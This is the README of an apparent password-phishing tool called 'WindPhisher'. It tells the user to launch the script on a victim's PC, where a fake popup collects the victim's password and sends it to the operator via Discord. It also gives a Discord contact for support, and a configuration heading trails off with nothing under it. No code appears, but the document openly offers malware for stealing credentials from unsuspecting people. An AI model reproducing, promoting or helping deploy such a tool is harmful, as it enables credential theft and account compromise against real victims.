BGM00000/WindPhisher/README.md

 Launch the script on the Pc victim and wait for that the popup appears on the victim's screen ,when the victim will have put his password it will be sent to you on discord.

+(If you have probleme contact me on Discord ロワイヤル#6167 )

 # Configuration :